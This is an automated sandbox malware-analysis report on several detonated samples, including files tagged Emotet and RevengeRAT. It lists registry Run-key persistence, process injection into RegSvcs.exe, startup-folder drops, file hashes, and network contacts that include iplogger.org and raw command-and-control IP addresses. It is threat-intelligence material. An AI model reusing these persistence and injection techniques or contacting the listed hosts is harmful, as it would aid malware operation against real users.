Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\wou\\odm.exe C:\\Users\\Admin\\AppData\\Roaming\\wou\\kja-pex" C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1760 set thread context of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 set thread context of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2376 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4984 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 4880 wrote to memory of 6064 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 5820 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 5640 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 1760 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe
PID 2228 wrote to memory of 5516 N/A C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\odm.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe

"C:\Users\Admin\AppData\Local\Temp\2c01b007729230c415420ad641ad92eb.exe"

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

"C:\Users\Admin\AppData\Roaming\wou\odm.exe" kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\kja-pex

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\kja-pex

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

C:\Users\Admin\AppData\Roaming\wou\HIVTQ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5640 -ip 5640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 80

C:\Users\Admin\AppData\Roaming\wou\odm.exe

C:\Users\Admin\AppData\Roaming\wou\odm.exe C:\Users\Admin\AppData\Roaming\wou\JSZQY

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Roaming\wou\odm.exe

MD5 71d8f6d5dc35517275bc38ebcc815f9f
SHA1 cae4e8c730de5a01d30aabeb3e5cb2136090ed8d
SHA256 fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b
SHA512 4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

C:\Users\Admin\AppData\Roaming\wou\rid.ico

MD5 a5f2dcee6a2a6047aa8fdde1ae2ce290
SHA1 7a082661c9a3431cd89ed4d9959178d60b9570f7
SHA256 7da78e767ff859970c8dae593b62f1366c2c651500eb280f0077a2245a9a8625
SHA512 e001300fc56f9bc8e9d61cb904ea6dec5ca447729015c9ff3dccc021f319fcce57ebaabb196a56f80d249dfbb88b4a0a273858cf14c7b9a93c10c9c8bc243d0a

C:\Users\Admin\AppData\Roaming\wou\HIVTQ

MD5 2fc79199952da8ef486b513a911b6fd4
SHA1 c840b0684f2ebdbbf603fabf4a32e629453c48d0
SHA256 a4ff9e68389eceb7e9fe4a6c428d156e9b5536e1dc1f83f05e3c69ce312f465c
SHA512 7b4fd2a5fb42fbfd4e4f5b4a19b82aa4761bf40192eef83321a034cd531e8a7309e5c68628e594435ae0869579bc251d8eef168c833dc8dbbf75e68d41ec0f4d

memory/2532-96-0x0000000000710000-0x00000000007DC000-memory.dmp

memory/2532-97-0x0000000000710000-0x00000000007DC000-memory.dmp

C:\Users\Admin\AppData\Roaming\wou\JSZQY

MD5 9375872d82fbfe00eb4f6e608aa170d8
SHA1 b6d6f7059c025075141293cc0c1f80c1063ef75b
SHA256 a1b44347af8b2b2bf0409bb96e99f012035dc494ef44db409dbcd2bb726ff2e9
SHA512 f05e7f8c5d4edc6c41c0a2e4c63492a8578a4ae44e093396214fe422b90bd6e6d5fc98e1d8c4ee2253845a8b1a0bf202cd27450f641a8261d7f660b26162b863

C:\Users\Admin\AppData\Roaming\wou\spd

MD5 098f6bcd4621d373cade4e832627b4f6
SHA1 a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
SHA256 9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08
SHA512 ee26b0dd4af7e749aa1a8ee3c10ae9923f618980772e473f8819a5d4940e0db27ac185f8a0e1d5f84f88bc887fd67b143732c304cc5fa9ad8e6f57f50028a8ff

Analysis: behavioral8

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

102s

Max time network

115s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe

"C:\Users\Admin\AppData\Local\Temp\3DMark 11 Advanced Edition.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:15

Platform

win10v2004-20250502-en

Max time kernel

149s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

Signatures

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe

"C:\Users\Admin\AppData\Local\Temp\Archive.zip__ccacaxs2tbz2t6ob3e.exe"

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 domainht6.ml udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:80 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 google-analytics.com udp
DE 142.250.181.228:80 google-analytics.com tcp
US 8.8.8.8:53 osdsoft.com udp
US 103.224.182.253:80 osdsoft.com tcp
US 8.8.8.8:53 ww38.osdsoft.com udp
US 13.248.148.254:80 ww38.osdsoft.com tcp
US 8.8.8.8:53 linkury.s3-us-west-2.amazonaws.com udp
US 52.92.160.250:443 linkury.s3-us-west-2.amazonaws.com tcp
US 8.8.8.8:53 ocsp.r2m01.amazontrust.com udp
GB 143.204.67.183:80 ocsp.r2m01.amazontrust.com tcp
DE 142.250.181.228:80 google-analytics.com tcp
US 8.8.8.8:53 install.portmdfmoon.com udp
US 8.8.8.8:53 install.portmdfmoon.com udp
DE 142.250.184.195:80 c.pki.goog tcp

Files

C:\Users\Admin\AppData\Local\Temp\AF89.tmp.exe

MD5 060404f288040959694844afbd102966
SHA1 e0525e9ef6713fd7f269a669335ce3ddaab4b6a1
SHA256 40517e822f3442a2f389a50e905f40a6a2c4930077c865e3ea7b1929405f760a
SHA512 ddf8c53e1e1888084fa5422f297cc3ba9d97f7576c36f6b633ce67ca789127f7e259e9fb374fcbced66f883dadde0717d81ecce9776770bf07d8cf3b94b1a43f

Analysis: behavioral18

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:14

Platform

win10v2004-20250502-en

Max time kernel

144s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe"

Signatures

Emotet

trojan banker emotet

Emotet family

emotet

Emotet payload

trojan banker
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\odbcad32\FXSRESM.exe C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\notepad.exe C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A
File opened for modification C:\Windows\notepad.exe C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcad32\FXSRESM.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe

"C:\Users\Admin\AppData\Local\Temp\f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a.exe"

C:\Windows\SysWOW64\odbcad32\FXSRESM.exe

"C:\Windows\SysWOW64\odbcad32\FXSRESM.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
JM 72.27.212.209:8080 tcp
US 172.125.40.123:80 tcp
US 8.8.8.8:53 c.pki.goog udp
DE 142.250.184.195:80 c.pki.goog tcp
SG 185.201.9.197:8080 tcp
US 64.207.182.168:8080 tcp
DE 51.89.36.180:443 tcp
US 24.179.13.119:80 tcp

Files

memory/1592-7-0x0000000000470000-0x000000000047F000-memory.dmp

memory/1592-4-0x0000000002260000-0x0000000002270000-memory.dmp

memory/1592-0-0x0000000002240000-0x0000000002252000-memory.dmp

C:\Windows\SysWOW64\odbcad32\FXSRESM.exe

MD5 8b273f919ea075cff8c652c51a301bbb
SHA1 917baa65532900d1dbd0a3925a898ecf0b4cd569
SHA256 f28e02bd1e9cc701437328dc7bec07b439b5b97277a7983e9ca302fbc550e48a
SHA512 b71c4aa7259535889126742045c820f703a5a9caa49b8496620d4566da22f65706e7e617d34ac08e741d96da0f98e617daac2ca02882ab887a4f98fe432d699e

memory/1592-9-0x0000000000400000-0x0000000000442000-memory.dmp

memory/5280-10-0x0000000000510000-0x0000000000522000-memory.dmp

memory/5280-14-0x0000000000530000-0x0000000000540000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:12

Platform

win10v2004-20250502-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2025-05-04 05:10

Reported

2025-05-04 05:14

Platform

win10v2004-20250502-en

Max time kernel

149s

Max time network

150s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\REVENGE-RAT.js

Signatures

RevengeRAT

trojan revengerat

Revengerat family

revengerat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\inststa.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe C:\Users\Admin\Documents\foldani.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msta.exe C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cjnsta.vbs C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tenakt.js C:\Users\Admin\Documents\foldani.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hadiya.lnk C:\Users\Admin\Documents\foldani.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\elBV.URL C:\Users\Admin\Documents\foldani.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3623617754-4043701611-775564599-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tenakna = "C:\\Users\\Admin\\Documents\\foldani.exe" C:\Users\Admin\Documents\foldani.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4760 set thread context of 884 N/A C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe C:\Users\Admin\AppData\Local\Temp\tacbvfff.exe
PID 4660 set thread context of 2668 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe
PID 3364 set thread context of 3396 N/A C:\Users\Admin\Documents\foldani.exe C:\Users\Admin\Documents\foldani.exe

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Documents\foldani.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
